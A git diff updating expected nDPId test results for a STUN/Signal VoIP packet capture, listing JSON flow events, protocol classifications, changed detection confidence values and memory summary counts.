+00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936667,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47204,"dst_port":19302,"l4_proto":"udp","ndpi": {"confidence": {"3":"DPI (partial)"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936667,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47204,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1636901958294,"flow_last_seen":1636901970409,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":7870,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936070,"flow_last_seen":1636901939887,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014416,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
-00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936663,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998588,"flow_last_seen":1636902019979,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 
-00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956929,"flow_last_seen":1636901980724,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1636901956886,"flow_last_seen":1636901987907,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014417,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956921,"flow_last_seen":1636901978319,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} -00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998589,"flow_last_seen":1636902019976,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 
-00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1636902000073,"flow_last_seen":1636902002742,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":6170,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1636901998654,"flow_last_seen":1636902021384,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1636901936083,"flow_last_seen":1636901987911,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":1768,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1636901958294,"flow_last_seen":1636901970409,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":7870,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936070,"flow_last_seen":1636901939887,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014416,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936663,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998588,"flow_last_seen":1636902019979,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956929,"flow_last_seen":1636901980724,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1636901956886,"flow_last_seen":1636901987907,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014417,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956921,"flow_last_seen":1636901978319,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 
+00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998589,"flow_last_seen":1636902019976,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1636902000073,"flow_last_seen":1636902002742,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":6170,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1636901998654,"flow_last_seen":1636902021384,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1636901936083,"flow_last_seen":1636901987911,"flow_idle_time":140000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":1768,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","packets-captured":460,"packets-processed":460,"total-skipped-flows":0,"total-l4-payload-len":29600,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":22,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":23,"total-idle-flows":23,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":141,"global_ts_msec":1636902021384} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 460/460 @@ -147,9 +147,9 @@ ~~ total active/idle flows...: 23/23 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5914443 bytes -~~ total memory freed........: 5914443 bytes -~~ total allocations/frees...: 118670/118670 +~~ total memory allocated....: 6048077 bytes +~~ total memory freed........: 6048077 bytes +~~ total allocations/frees...: 121432/121432 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 844 chars 
diff --git a/test/results/synscan.pcap.out b/test/results/synscan.pcap.out
index 911ceeee5..3c5a450f2 100644
--- a/test/results/synscan.pcap.out
+++ b/test/results/synscan.pcap.out
